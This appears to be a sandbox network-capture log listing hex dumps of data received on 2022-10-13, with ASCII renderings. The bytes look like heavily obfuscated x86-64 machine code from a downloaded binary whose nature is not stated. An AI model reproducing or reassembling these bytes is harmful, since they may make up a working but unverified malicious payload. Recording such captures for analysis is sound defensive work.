                                                                                                                2022-10-13 11:07:31 UTC3215INData Raw: 9c d3 f9 66 d3 f1 8f 44 25 00 66 41 0f 4f cd 48 81 f8 69 4c 16 7f 0f a4 c1 b4 41 8b 0b f9 f5 49 81 c3 04 00 00 00 41 3a fe 66 f7 c2 f2 39 33 ce c1 c9 03 81 f1 be 40 90 08 f5 f8 81 c1 c2 01 e0 37 40 84 e9 0f c9 66 85 f6 56 66 d3 fe 66 0f bc f6 31 0c 24 66 0f ba f6 a3 5e 48 63 c9 41 f6 c3 6c e9 92 3a ff ff e9 45 3e f5 ff 44 0f b6 07 45 86 db 48 81 c7 01 00 00 00 66 44 0b df 45 2a dc 66 41 0f ab d3 44 32 c3 44 8a dd 41 ff c3 41 fe c0 41 80 f0 da 41 80 d3 23 41 f6 d8 41 80 c0 9d 4c 63 de 45 86 db 45 02 df 41 f6 d0 66 41 d3 fb 44 0f bc d8 4d 2b d9 41 80 c0 4f 41 d0 c8 41 fe c0 66 44 0f be dd 41 c1 d3 a6 41 b3 03 41 d0 c0 41 80 e8 cf 49 0f ba e3 3d 41 32 d8 46 8b 1c 04 f5 49 81 e9 04 00 00 00 45 89 19 45 0f bb db 44 8b 1f f5 f9 48 81 c7 04 00 00 00 f9 44 33 db
                                                                                                                Data Ascii: fD%fAOHiLAIA:f93@7@fVff1$f^HcAl:E>DEHfDE*fAD2DAAAA#AALcEEAfADM+AOAAfDAAAAI=A2FIEEDHD3
                                                                                                                2022-10-13 11:07:31 UTC3231INData Raw: 8a 7d 08 48 81 c5 0a 00 00 00 4d 0f bb db 41 d2 c3 49 f7 d3 26 40 88 39 45 0f b7 da 44 8b 1b 48 81 c3 04 00 00 00 f5 45 33 d8 e9 c4 4b 04 00 48 03 ea e9 f3 6b f8 ff 48 81 c5 04 00 00 00 66 41 f7 c2 2a 79 f5 33 cf f7 d9 e9 3f 04 02 00 41 50 c3 ff c5 e9 7b a5 03 00 48 81 e4 f0 ff ff ff f9 48 03 e1 44 3a cb f9 48 f7 c2 3b 5e f8 22 85 db e9 05 3c f5 ff 41 53 41 d2 e3 41 c0 db 83 49 0f ba fb 66 44 31 0c 24 41 5b 66 85 df e9 81 ce f0 ff 48 03 fe e9 4a e7 fc ff 66 41 0f b6 1b 45 8a 43 02 48 c1 f7 4a 40 c0 df 1e 49 81 eb 06 00 00 00 f6 d3 48 0f bb d7 48 0f bf fa 41 f6 d0 66 0f be fa 40 8a fc 66 d3 ef 41 22 d8 66 41 89 5b 08 41 0f b7 fc 9c e9 30 83 fa ff 8b 3e 41 0f ba e1 aa 44 8b 4e 04 66 d3 c2 8a 4e 08 48 81 ea 5b 40 69 7a 41 12 d5 66 f7 d2 48 81 ee 02 00 00 00
                                                                                                                Data Ascii: }HMAI&@9EDHE3KHkHfA*y3?AP{HHD:H;^"<ASAAIfD1$A[fHJfAECHJ@IHHAf@fA"fA[A0>ADNfNH[@izAfH
                                                                                                                2022-10-13 11:07:31 UTC3247INData Raw: 44 33 d3 f8 41 f7 da f8 41 d1 ca 4c 3b eb 41 f7 da 41 d1 ca 41 f7 da 49 85 ea 41 81 f2 33 00 80 0a 41 f7 da 53 66 c1 f3 c9 48 d3 f3 44 31 14 24 40 02 df fe c3 80 eb 20 5b e9 13 05 f7 ff 41 50 41 f6 d8 4d 0f b7 c3 e9 8a 36 f8 ff 4d 8b 10 40 80 ce 50 41 1a ca 8a ca 49 8b 70 08 d2 d1 66 81 fe 7f 5a 41 8a 48 10 f8 f5 49 81 c0 02 00 00 00 45 3a f5 49 0f a5 f2 66 40 0f b6 cd b9 48 7a 63 4e 0f 96 c5 4d 89 50 08 66 41 0f be c8 0f b7 ca e9 c1 bb fb ff 48 8b 4c 25 00 66 44 0f be d9 41 fe c3 66 23 f6 44 8b 5d 08 66 c1 e6 2a d3 ce 66 0f ba e6 18 48 81 c5 0c 00 00 00 66 81 c6 28 6c 40 80 ee c3 44 89 19 8b 33 f8 48 81 c3 04 00 00 00 41 33 f0 81 c6 41 60 a8 7b f9 c1 ce 03 f7 de f8 e9 83 5f f8 ff 41 ff c8 4d 3b c7 41 0f c8 a9 37 76 d3 72 f8 41 f7 d0 66 3b c3 41 f7 c7 72
                                                                                                                Data Ascii: D3AAL;AAAIA3ASfHD1$@ [APAM6M@PAIpfZAHIE:If@HzcNMPfAHL%fDAf#D]f*fHf(l@D3HA3A`{_AM;A7vrAf;Ar
                                                                                                                2022-10-13 11:07:31 UTC3263INData Raw: eb 45 0f bb db 31 14 24 66 41 81 c3 30 12 41 5b f8 84 f0 48 63 d2 41 3a cb 41 80 f8 69 48 03 da e9 2e 9b fe ff ff 74 25 00 41 c0 c9 84 41 80 d9 1f 48 81 c5 08 00 00 00 41 0f a3 c1 41 ff c9 9d 44 8b 0b 41 84 e1 48 81 c3 04 00 00 00 f8 45 33 c8 f8 41 81 e9 19 75 96 1e f9 41 81 f1 04 12 5c 20 e9 e1 84 ff ff 0f cf e9 6a 2b fb ff 55 c3 ff ce 66 44 3b c2 f5 f7 de e9 ac 8a f3 ff 0f cd e9 1f 7d f0 ff 41 ff c1 e9 3e 33 f2 ff 66 41 8b 39 49 81 c1 02 00 00 00 49 81 e8 01 00 00 00 66 d3 ea d2 f6 41 0f b6 10 44 3a e7 32 d3 f6 da e9 b7 71 fd ff ff c9 66 44 3b fb f7 d9 f9 4d 3b ee 41 50 31 0c 24 66 41 d3 d0 41 58 f7 c2 17 07 12 4b 48 63 c9 45 85 e4 48 03 d9 e9 1a 37 fc ff e9 4b 7f f1 ff 66 89 3c 1c 66 45 0f ab d3 66 41 0f bb e3 66 41 81 e3 a1 6d 49 81 e8 04 00 00 00 45
                                                                                                                Data Ascii: E1$fA0A[HcA:AiH.t%AAHAADAHE3AuA\ j+UfD;}A>3fA9IIfAD:2qfD;M;AP1$fAAXKHcEH7Kf<fEfAfAmIE
                                                                                                                2022-10-13 11:07:31 UTC3279INData Raw: 00 00 45 33 cb e9 ef 27 f5 ff 4c 8b 4c 25 00 66 41 0f 4c fa 48 8b 7d 08 48 81 c5 0c 00 00 00 f9 66 41 85 cd 2b c9 41 80 ff 37 f9 48 85 ff 0f 84 98 14 f6 ff 4c 8d 1d fa f0 f0 ff 44 0f a4 c6 78 41 0f b6 31 33 f1 f5 66 45 85 f6 81 e6 ff 00 00 00 41 8b 34 b3 f9 c1 e9 08 33 ce e9 d0 26 f5 ff 0f ca e9 c0 3b f5 ff 49 8b 0b 66 41 0f ba f1 61 4d 8b 4b 08 48 f7 d1 49 f7 d1 66 0f ba fa e1 49 23 c9 49 89 4b 08 9c 80 ce 58 2a f0 d3 ca 41 8f 03 d2 c6 13 d4 66 0f bd d4 49 81 ea 04 00 00 00 41 8b 12 e9 55 2f f5 ff 41 51 66 41 0f ba f9 a5 31 14 24 41 59 41 80 fd 66 66 41 f7 c5 9d 19 66 45 85 d7 48 63 d2 66 41 85 e4 48 03 ea e9 1d b4 ff ff 49 8b 41 08 66 c1 f5 8e 41 0f bd d6 49 8b 11 66 45 3b c9 49 81 e9 08 00 00 00 66 0f cd 4c 0f a3 cd 48 f7 e2 0f bf eb 49 89 51 08 48 0f
                                                                                                                Data Ascii: E3'LL%fALH}HfA+A7HLDxA13fEA43&;IfAaMKHIfI#IKX*AfIAU/AQfA1$AYAffAfEHcfAHIAfAIfE;IfLHIQH
                                                                                                                2022-10-13 11:07:31 UTC3295INData Raw: 81 c7 78 41 86 7e e9 36 01 fc ff 41 f7 d0 e9 d3 3d 01 00 41 ff c9 41 c1 c1 03 f8 e9 26 4e f4 ff 4c 8b dd 48 81 ed 04 00 00 00 44 89 5c 25 00 41 80 d3 5e 66 45 87 db 66 44 0f bc d9 44 8b 1b f8 48 85 d4 e9 ce 7d fc ff 49 8b 30 45 32 cc 66 d3 d8 66 41 8b 40 08 41 d2 d1 49 81 c0 0a 00 00 00 41 80 d9 1a 41 80 c1 6a 66 89 06 66 41 0f ab e1 44 2a cd 4d 63 cf 44 8b 0b 44 84 f7 48 81 c3 04 00 00 00 44 3b c0 45 33 cb 41 f7 d9 e9 1a c9 f1 ff 41 0f cb e9 b1 90 f4 ff ff ca c1 c2 03 e9 6d 6e f1 ff 66 45 8b 01 66 41 8b 49 02 49 63 e8 66 44 0f ac cd 9e 49 81 e9 06 00 00 00 48 c1 f5 93 f5 0f a3 fd 66 44 03 c1 66 45 89 41 08 48 0f 4e ee 66 bd 51 0e 9c 41 8f 01 49 8b eb 4c 0f bb c5 8b 2f 48 81 c7 04 00 00 00 f5 44 84 fa 33 eb f9 c1 c5 03 ff c5 f9 e9 e9 2a 00 00 41 80 fb dc
                                                                                                                Data Ascii: xA~6A=AA&NLHD\%A^fEfDDH}I0E2ffA@AIAAjffAD*McDDHD;E3AAmnfEfAIIcfDIHfDfEAHNfQAIL/HD3*A
                                                                                                                2022-10-13 11:07:31 UTC3311INData Raw: df e0 f9 9f a8 43 6c fb 36 d5 5c fc 41 6f 0d f5 d8 f9 3d f2 af c4 10 94 19 52 20 93 6e e8 71 9a f7 7e 41 9d 80 dd d4 f9 1e 4b e4 fe 69 f1 b5 f7 f0 67 85 f0 87 f6 98 4f 17 60 a8 48 60 da f9 41 f9 4c c9 46 8e ef 5c 22 10 79 6c 25 67 c3 3d 2c fe 55 0d 2b 89 a0 00 23 04 36 30 24 73 8c 61 2d ea 1a 51 2a 9d b9 c4 4e 03 2f f4 49 74 95 a5 40 ed 03 95 47 9a 92 88 f8 0a 04 b8 ff 7d be e9 f6 e4 28 d9 f1 93 8b 4c 95 0d 1d 7c 92 7a a7 2d 9b e3 31 1d 9c 94 9c 71 26 54 0a 41 21 23 b0 10 28 ba 26 20 2f cd 85 b5 4b 53 13 85 4c 24 a9 d4 45 bd 3f e4 42 ca ae f9 fd 5a 38 c9 fa 2d 82 98 f3 b4 14 a8 f4 c3 b7 3d 90 5d 21 0d 97 2a 9b 5c 9e b3 0d 6c 99 c4 f8 61 91 49 6e 51 96 3e d4 00 9f a7 42 30 98 d0 e1 a5 fc 4e 77 95 fb 39 cd c4 f2 a0 5b f4 f5 d7 ca e9 4a 47 5c d9 4d 30 e6 88
                                                                                                                Data Ascii: Cl6\Ao=R nq~AKigO`H`ALF\"yl%g=,U+#60$sa-Q*N/It@G}(L|z-1q&TA!#(& /KSL$E?BZ8-=]!*\laInQ>B0Nw9[JG\M0
                                                                                                                2022-10-13 11:07:31 UTC3327INData Raw: c8 55 66 0f ba fd 2e 44 31 04 24 5d f8 4d 63 c0 49 03 f0 56 c3 f9 c1 c7 03 49 81 fe 12 6d 9b 24 f8 53 c0 c7 af 31 3c 24 5b f8 41 f7 c1 f9 27 fa 36 48 63 ff f5 48 03 ef e9 48 08 f4 ff f9 41 80 fc 2d 41 50 31 3c 24 49 c1 c8 db 45 03 c7 66 41 0f b3 c0 41 58 48 63 ff 4d 3b f8 4c 03 d7 e9 6e c3 f6 ff 41 81 f3 33 40 d5 5d e9 03 ff ff ff 41 51 c3 ff e3 f5 48 81 c7 04 00 00 00 f6 c2 6d f8 66 41 85 f2 44 33 db f9 41 f7 db e9 11 f3 f2 ff 48 f7 c4 50 46 ff 2f f5 f7 d9 f8 f9 c1 c9 02 ff c1 41 50 41 80 f0 ed 31 0c 24 41 58 48 63 c9 4c 03 d1 e9 79 4e 02 00 d1 c5 f8 81 f5 30 1b c6 11 81 c5 0e 0a d3 3a 53 66 d3 f3 66 0f a3 c3 31 2c 24 f5 5b 48 81 f8 b2 11 86 53 f9 48 63 ed 48 03 f5 e9 26 b3 fe ff 57 c3 f7 dd 40 3a c6 f7 d5 41 53 4c 63 dc 41 d2 d3 31 2c 24 41 c0 fb 21 41
                                                                                                                Data Ascii: Uf.D1$]McIVIm$S1<$[A'6HcHHA-AP1<$IEfAAXHcM;LnA3@]AQHmfAD3AHPF/APA1$AXHcLyN0:Sff1,$[HSHcH&W@:ASLcA1,$A!A
                                                                                                                2022-10-13 11:07:31 UTC3343INData Raw: ca 41 53 41 80 f3 1e 44 31 14 24 41 5b 4d 63 d2 66 45 85 c8 41 f6 c1 02 49 03 da e9 2c 45 fb ff e9 09 40 f0 ff e9 5b c8 f3 ff 49 81 c3 04 00 00 00 f8 41 3a cc 33 ce f8 f7 d9 f5 81 e9 41 49 df 3b 0f c9 81 e9 2a 64 e1 1b 0f c9 e9 35 c2 f6 ff f5 41 d1 c1 e9 c1 f6 fa ff 66 8b 4c 25 00 66 d3 e2 41 2a d3 66 8b 55 02 0f 93 c0 66 41 0f be c1 86 e0 48 81 ed 06 00 00 00 66 0f a3 e8 f6 dc 44 0f ac d0 d3 66 03 ca b8 5b 28 23 20 66 41 0f b6 c3 66 89 4d 08 9c 49 0f bf c5 66 2d df 5d c0 cc 6b 8f 44 25 00 0f b3 f8 48 81 ee 04 00 00 00 d3 c8 66 0f a4 c0 92 8b 06 41 33 c3 4c 3b de 35 38 20 a1 38 44 3a c9 f5 f7 d8 f6 c1 3a 05 31 28 d0 7f f9 66 f7 c6 2f 79 f5 0f c8 2d cb 2b 74 69 41 53 41 bb 6f 27 0b 7d 31 04 24 49 f7 d3 41 5b 66 41 f7 c2 37 1f f8 48 63 c0 41 3b e4 66 41 81
                                                                                                                Data Ascii: ASAD1$A[McfEAI,E@[IA:3AI;*d5AfL%fA*fUfAHfDf[(# fAfMIf-]kD%HfA3L;58 8D::1(f/y-+tiASAo'}1$IA[fA7HcA;fA
                                                                                                                2022-10-13 11:07:31 UTC3359INData Raw: f1 36 8b 30 49 81 f0 d1 08 b0 10 41 d2 e8 48 81 c3 04 00 00 00 66 44 33 c6 89 33 4d 0f bb f0 41 80 e0 b9 41 d3 f0 44 8b 44 25 00 48 81 c5 04 00 00 00 f9 44 33 c7 41 d1 c0 e9 da 57 ef ff 41 8b 1b 86 c9 45 8b 4b 04 f6 d9 41 8a 4b 08 49 81 eb 02 00 00 00 f8 44 0f a5 cb 41 89 5b 08 9c 41 8f 03 f8 48 0f ba f1 01 49 81 ea 04 00 00 00 41 8b 0a f9 e9 ef 4a f7 ff 41 58 f8 44 84 ed 48 63 ff 41 80 fd 6c 4c 03 d7 41 52 c3 f7 d5 e9 20 7c fd ff 49 81 ea 02 00 00 00 0f a3 fa 41 80 db bd 49 0f ba e3 0c 45 0f b7 1a 66 d3 f2 66 45 33 d8 66 0f ba fa 0c 40 84 ec 66 41 f7 d3 b2 03 66 41 0f be d1 66 0f ba fa 5a 66 41 81 eb 7b 2d 66 41 d1 cb 66 0f b6 d0 66 41 81 c3 95 2e 66 41 f7 d3 66 45 33 c3 48 0f ca 48 81 ee 02 00 00 00 d2 e2 66 0f ba fa 52 66 44 89 1e 66 ba 79 46 49 81 ea
                                                                                                                Data Ascii: 60IAHfD33MAADD%HD3AWAEKAKIDA[AHIAJAXDHcAlLAR |IAIEffE3f@fAfAfZfA{-fAffA.fAfE3HHfRfDfyFI
                                                                                                                2022-10-13 11:07:31 UTC3375INData Raw: 41 fe c8 31 3c 24 45 33 c3 f5 41 d2 f0 41 58 f8 f5 e9 2c 32 f3 ff d1 c0 f7 d8 0f c8 f8 e9 50 6f ef ff 56 49 0f bc f2 31 1c 24 f6 c3 e4 66 d3 ce 0f bf f7 5e 41 f6 c5 b7 44 3a ef f9 48 63 db 66 44 85 c2 4c 03 c3 e9 b3 61 f0 ff 0f c9 e9 22 a1 fe ff 66 41 89 50 08 41 8b d0 49 0f bf d3 9c e9 1d 72 00 00 41 51 c3 ff e6 48 8b 4c 25 00 48 f7 d8 4c 8b 45 08 66 c1 d0 03 0f c1 c0 66 98 48 f7 d1 66 d3 e0 49 f7 d0 48 d3 c0 49 23 c8 48 89 4d 08 9c 8f 44 25 00 4c 0f b3 f8 34 36 66 41 0f bd c5 48 81 ee 04 00 00 00 8b 06 e9 e9 63 ef ff e9 58 f3 fd ff ff c2 66 81 fc 43 57 40 3a cd f7 da e9 c1 85 f1 ff 4c 8b 4c 25 00 66 0f a4 d7 29 40 32 ff 65 49 8b 11 66 0f ab d7 f8 48 89 54 25 00 66 ff cf 48 81 ee 04 00 00 00 49 63 f8 40 32 fa 8b 3e f7 c2 42 3f 33 62 41 33 fb 40 f6 c5 66
                                                                                                                Data Ascii: A1<$E3AAX,2PoVI1$f^AD:HcfDLa"fAPAIrAQHL%HLEffHfIHI#HMD%L46fAHcXfCW@:LL%f)@2eIfHT%fHIc@2>B?3bA3@f
                                                                                                                2022-10-13 11:07:31 UTC3391INData Raw: d0 41 80 d8 ba 41 58 f5 f8 4d 63 c9 f5 49 03 d9 e9 a7 21 f1 ff ff c9 f8 f5 c1 c9 03 f6 c3 e5 f7 d1 56 49 0f bc f0 44 84 f5 31 0c 24 5e 41 80 ff f4 48 63 c9 f8 66 85 c5 4c 03 c1 e9 9b 9f fe ff ff c8 f5 f7 d0 f8 f5 c1 c0 02 f9 41 f6 c7 ed 41 80 f8 0d 56 31 04 24 40 c0 e6 ab 40 d2 c6 4c 0f ab de 5e 44 3b f0 48 63 c0 4c 03 c0 e9 60 13 f2 ff e9 f4 2c fb ff ff ce 81 f6 58 37 80 15 f5 44 84 db 57 e9 95 25 ee ff 41 ff c2 e9 17 e7 f1 ff 40 fe c7 f5 40 f6 d7 f8 e9 62 00 fa ff 41 8b fe 4c 89 5d 08 40 8a fb f7 d7 9c 66 0f 4a fc 66 81 f7 ba 54 40 d2 cf 8f 44 25 00 66 0f ba f7 3a 66 81 f7 ac 24 8b 3b 66 41 f7 c7 ad 06 f8 48 81 c3 04 00 00 00 f5 f9 41 33 f8 f8 f9 d1 c7 f5 81 c7 26 72 57 54 f9 d1 c7 e9 5f ea fc ff ff c1 66 45 3b f8 f5 f9 41 53 44 8a df 4c 0f bf da 66 41
                                                                                                                Data Ascii: AAXMcI!VID1$^AHcfLAAV1$@@L^D;HcL`,X7DW%A@@bAL]@fJfT@D%f:f$;fAHA3&rWT_fE;ASDLfA
                                                                                                                2022-10-13 11:07:31 UTC3407INData Raw: 41 0f b7 c0 9c 24 98 48 d3 f0 8f 44 25 00 66 0f ba f8 de 48 81 ee 04 00 00 00 0f c0 e0 d2 d0 8b 06 44 3b c4 f5 e9 ac 5e f2 ff 33 eb 0f cd f8 c1 cd 03 45 3a e5 40 80 fe d1 81 f5 01 3a 20 3d ff cd f7 d5 e9 19 cd fd ff e9 f8 34 f6 ff f9 d1 c8 e9 e3 f7 f6 ff 49 8b 11 66 45 3b dd 80 e5 54 41 d2 ca 66 44 8b 12 fe c1 49 81 c1 06 00 00 00 66 45 89 11 c0 e1 67 8b 0f f8 49 81 fa fa 22 b0 75 e9 22 0b fd ff 4c 63 d3 66 45 89 48 08 41 0f 9f c2 9c 41 8f 00 66 45 2b d0 44 8b 13 48 81 c3 04 00 00 00 f9 e9 83 da fd ff ff c9 41 84 d6 41 51 f5 31 0c 24 45 1a c8 41 59 f8 41 3a d7 48 63 c9 f5 48 03 e9 e9 60 8a fd ff 41 50 41 fe c0 66 41 d3 d8 41 0f 94 c0 31 3c 24 49 d3 f0 45 86 c0 41 58 f9 44 84 e6 48 63 ff 41 80 fb 5d 40 f6 c4 fd 4c 03 d7 e9 a6 0f f7 ff 41 33 d3 f8 81 ea 59
                                                                                                                Data Ascii: A$HD%fHD;^3E:@: =4IfE;TAfDIfEgI"u"LcfEHAAfE+DHAAQ1$EAYA:HcH`APAfAA1<$IEAXDHcA]@LA3Y
                                                                                                                2022-10-13 11:07:31 UTC3423INData Raw: 02 00 00 00 44 0f c1 c8 0f b6 03 66 45 0f b3 f9 66 45 0b c9 48 81 c3 01 00 00 00 66 41 ff c1 41 32 c3 45 32 c9 41 80 e9 3d 04 ce 41 d2 c1 f6 d8 d0 c8 66 85 c0 44 2a ca f6 d8 45 0f bf ce d0 c0 44 32 d8 40 88 34 04 41 d2 e9 66 41 d3 c1 4d 63 ce 44 8b 0b 40 84 ff 40 f6 c4 c8 48 81 c3 04 00 00 00 f5 66 45 85 da 45 33 cb f9 e9 93 0c f2 ff 41 ff c1 40 f6 c5 db f5 f9 41 81 f1 86 2b de 59 41 80 f8 b4 41 81 c1 b6 01 e8 57 f8 4c 85 e7 41 81 f1 f1 34 4e 2b f9 44 3a d4 e9 ec 03 f9 ff f5 41 53 41 d2 eb 31 0c 24 f9 41 f6 db 49 c1 db 1b 41 5b 48 63 c9 f9 f7 c2 9a 0e e8 4e 48 03 f9 e9 7b 00 fd ff 0f bf fb 9c bf 23 6f 37 28 40 0f c0 ff 8f 06 49 81 e8 04 00 00 00 40 c0 e7 20 40 80 ef 94 41 8b 38 f8 40 84 de 41 33 f9 40 80 ff ed f7 df 81 ef ab 3c 44 67 f8 f5 d1 cf 0f cf f9
                                                                                                                Data Ascii: DfEfEHfAA2E2A=AfD*ED2@4AfAMcD@@HfEE3A@A+YAAWLA4N+D:ASA1$AIA[HcNH{#o7(@I@ @A8@A3@<Dg
                                                                                                                2022-10-13 11:07:31 UTC3439INData Raw: 81 eb 25 0b bc 19 66 3d ca 25 f8 41 0f cb 48 f7 c7 47 60 7d 4a 41 50 44 31 1c 24 4d 63 c2 45 87 c0 41 58 e9 41 31 f1 ff 4c 8b 4c 25 00 8a 45 08 66 41 0f ab d3 66 44 23 d8 4d 63 d9 48 81 c5 0a 00 00 00 41 88 01 41 d2 cb 4d 0f b7 dd 49 0f ba f3 0a 44 8b 1b 48 81 c3 04 00 00 00 40 f6 c4 4b f9 45 84 e5 45 33 d8 66 41 81 fd 8c 72 45 3a ea 41 f7 db f9 41 c1 cb 03 41 81 f3 ac 38 88 5b f9 41 d1 c3 66 3b cd 41 f7 c3 fa 6e f3 16 41 0f cb f9 41 84 cf f8 41 50 44 8a c7 4d 0f bf c1 66 41 0f bb c0 44 31 1c 24 41 58 80 f9 40 66 41 f7 c6 fe 1a 4d 63 db f5 f9 4d 03 d3 e9 d3 db fc ff ff e5 66 8b 55 02 66 41 81 c1 e8 3b 41 c1 f9 8b 41 d2 c1 48 81 ed 06 00 00 00 66 41 0f ab c1 f8 66 f7 d7 41 80 c9 8e 66 f7 d2 66 41 0f ba f9 99 41 81 e1 8f 3e c8 20 66 23 fa 4c 0f bf c8 66 89
                                                                                                                Data Ascii: %f=%AHG`}JAPD1$McEAXA1LL%EfAfD#McHAAMIDH@KEE3fArE:AAA8[Af;AnAAAPDMfAD1$AX@fAMcMfUfA;AAHfAfAffAA> f#Lf
                                                                                                                2022-10-13 11:07:31 UTC3455INData Raw: 00 00 49 89 08 66 d3 f7 4c 0f ac d7 1c 48 81 ee 04 00 00 00 40 f6 df 8b 3e 41 33 fb d1 c7 e9 7d 67 ee ff 41 52 c3 f8 45 33 d8 41 f7 db e9 12 2c f3 ff 41 fe c2 e9 ef b8 00 00 41 8b 00 45 02 cd 53 0f a2 45 0f ab f1 41 c0 d1 27 49 81 e8 0c 00 00 00 49 0f ab e1 66 45 0f a4 d9 3b 41 c1 f9 4e 41 89 40 0c 66 45 0f bc c9 41 89 58 08 44 0f ab cb 40 3a d6 41 89 48 04 66 0f bb f3 48 ff c3 41 0f 43 de 41 89 10 49 81 c1 5e 71 fc 26 5b 49 c1 f1 6a 44 8b 0b f6 c5 bc 45 3b c7 f9 48 81 c3 04 00 00 00 40 84 ee 66 44 3b c5 45 33 cb 41 d1 c9 44 84 ea 41 81 c1 ce 7b a1 39 f5 48 85 dc 41 0f c9 41 f7 d1 66 44 85 dc 41 f7 d9 f8 41 c1 c9 02 f5 41 81 f1 ed 20 da 14 f8 41 0f c9 44 3a d6 41 f7 d1 f5 41 f7 d9 f8 f6 c5 99 f5 41 53 41 d2 fb 41 0f 90 c3 45 0f ac fb 03 44 31 0c 24 41 d2
                                                                                                                Data Ascii: IfLH@>A3}gARE3A,AAESEA'IIfE;ANA@fEAXD@:AHfHACAI^q&[IjDE;H@fD;E3ADA{9HAAfDAAA AD:AAASAAED1$A
                                                                                                                2022-10-13 11:07:31 UTC3471INData Raw: c7 45 3a f9 89 14 3c 8b 03 48 81 c3 04 00 00 00 41 33 c0 f9 e9 4e 00 f9 ff e9 26 02 ea ff 41 0f ca f8 41 f7 da 41 51 41 b1 c4 44 31 14 24 41 d2 d9 41 c0 c1 8a 45 0f b3 f1 41 59 66 3b f7 48 85 f0 40 80 ff c9 4d 63 d2 49 03 ea 55 c3 49 81 ea 01 00 00 00 66 f7 d3 c0 ec e0 66 8b d8 41 0f b6 12 40 32 d5 66 0f c8 d0 ca 80 c2 cf 44 0f a3 e0 66 0f ba f3 36 86 e4 d0 ca 41 8a dc 9f 80 c2 5e 41 32 de 48 0f a3 f0 40 32 ea 66 44 0f ac d3 8c 66 81 f3 6c 2c 22 fb 66 8b 1c 14 4c 0f a3 f8 05 0f 25 ae 71 49 81 eb 02 00 00 00 66 41 89 1b 49 81 ea 04 00 00 00 41 8b 02 33 c5 66 f7 c4 8c 21 40 84 f1 35 41 71 29 1c e9 06 ef f9 ff ff c9 f9 53 0f c1 db 31 0c 24 66 41 0f 41 d8 0f c1 db 5b f5 48 63 c9 f8 48 03 f1 e9 68 34 fd ff 41 81 f1 4c 05 0f 4a 45 84 cf e9 08 82 f1 ff ff c8 f8
                                                                                                                Data Ascii: E:<HA3N&AAAQAD1$AAEAYf;H@McIUIffA@2fDf6A^A2H@2fDfl,"fL%qIfAIA3f!@5Aq)S1$fAA[HcHh4ALJE
                                                                                                                2022-10-13 11:07:31 UTC3487INData Raw: 66 f7 c2 a6 00 41 33 c8 0f c9 e9 c8 3f fe ff 48 8b 16 4c 2b dd 41 80 cb 47 45 0a de 4c 8b 5e 08 66 41 0f bd c9 48 1b c9 49 03 d3 0f bf c9 8a ea 48 89 56 08 9c 8f 06 66 44 0f a3 f1 0f ba f9 cf 49 81 ea 04 00 00 00 86 cd 41 8b 0a 41 f6 c0 cc 66 44 3b e4 f9 41 33 c8 e9 8d 26 ed ff e9 c8 6b f4 ff 41 81 e8 5d 7e c0 0e 66 45 3b c8 f8 41 f7 d8 41 81 f0 4b 6d a5 2a 41 ff c8 f9 f8 55 66 44 0f ac fd 63 4c 85 d8 44 31 04 24 5d f5 4d 63 c0 49 03 f0 e9 d2 ac f9 ff 4d 8b 19 66 0f c9 66 41 8b 0b 80 da c7 49 81 c1 06 00 00 00 66 40 0f b6 d4 80 ca c1 41 f6 c5 98 66 41 89 09 99 41 84 db f9 49 81 e8 04 00 00 00 66 0f ca 41 8b 10 44 84 f2 e9 11 f6 fb ff 48 0b c5 e9 e2 83 f1 ff 41 d1 cb 41 81 c3 e3 0d 24 14 e9 70 70 f0 ff 4c 8b 0e c0 e9 8c 0f 9e c1 8a 4e 08 66 41 81 fa 7b 15
                                                                                                                Data Ascii: fA3?HL+AGEL^fAHIHVfDIAAfD;A3&kA]~fE;AAKm*AUfDcLD1$]McIMffAIf@AfAAIfADHAA$ppLNfA{
                                                                                                                2022-10-13 11:07:31 UTC3503INData Raw: 68 36 66 89 11 8b 03 48 81 c3 04 00 00 00 41 33 c3 e9 eb 18 f3 ff ff c1 f9 41 53 41 d2 cb 66 45 87 db 66 45 0f ab db 31 0c 24 41 5b e9 76 8c f9 ff 0f 84 bb b3 ed ff 4c 8d 0d ff ea f8 ff 81 e6 98 0a 3c 5c 0f b6 32 33 f5 81 e6 ff 00 00 00 f8 f5 41 8b 34 b1 f5 40 3a dc 66 41 85 f9 c1 ed 08 e9 5f da f0 ff 4c 8b 16 66 d1 c8 e9 05 e8 ee ff 40 3a c4 53 66 c1 fb aa 66 87 db 66 44 0f a4 f3 23 31 3c 24 c1 f3 22 5b 48 63 ff 40 f6 c6 20 48 03 ef e9 a7 87 f2 ff c1 c0 02 f6 c3 1d 4c 85 f6 f8 f7 d8 41 50 31 04 24 41 0f a3 e8 41 d3 e0 66 41 c1 f8 8d 41 58 f9 48 63 c0 66 41 f7 c2 3f 26 f5 f8 48 03 d8 e9 72 50 ee ff 0f 85 8a 7a f6 ff 5e f9 66 41 81 eb e1 26 f7 d0 44 84 c0 66 45 0f b6 dd 89 06 4d 0f bf da 41 f6 db 49 81 e8 04 00 00 00 40 f6 c4 78 45 0f b3 fb 45 8b 18 41 f6
                                                                                                                Data Ascii: h6fHA3ASAfEfE1$A[vL<\23A4@:fA_Lf@:SfffD#1<$"[Hc@ HLAP1$AAfAAXHcfA?&HrPz^fA&DfEMAI@xEEA
                                                                                                                2022-10-13 11:07:31 UTC3519INData Raw: d3 66 41 c1 d2 11 41 0f ab ea 89 54 25 00 41 0f ba f2 66 41 d2 ea f8 45 8b 13 f9 49 81 c3 04 00 00 00 44 33 d6 66 3b c8 41 0f ca 45 3a ff f9 41 81 ea 11 47 8b 09 f9 f8 f5 41 c1 c2 02 41 81 fa 40 4b 89 5a 41 81 ea 94 10 70 03 f8 e9 1f ef f0 ff ff c1 41 53 66 41 0f cb 41 fe cb 31 0c 24 49 81 c3 69 74 56 25 41 5b 66 3b e8 48 63 c9 66 3d aa 6c f6 c6 9e 48 03 f9 e9 76 69 ee ff 48 81 f9 45 33 d4 58 49 0f a5 f2 41 0f b7 cc 66 87 c9 41 0f 47 cd 4d 89 51 08 9c 66 d3 d1 44 0f ab c9 66 f7 d1 41 8f 01 49 81 e8 04 00 00 00 48 0f ba f1 6b 41 8b 08 33 cb c1 c9 03 f8 66 44 85 ef 81 f1 e8 5f f4 36 e9 7e 16 f8 ff ff c7 f7 d7 e9 92 69 fc ff 0f 85 41 a8 fe ff 48 8b d0 e9 62 13 fb ff e9 70 e7 fc ff ff c2 81 f2 66 26 56 4a d1 c2 41 3a f9 41 50 41 c1 f0 0a 66 41 0f ab d8 31 14
                                                                                                                Data Ascii: fAAT%AfAEID3f;AE:AGAA@KZApASfAA1$IitV%A[f;Hcf=lHviHE3XIAfAGMQfDfAIHkA3fD_6~iAHbpf&VJA:APAfA1
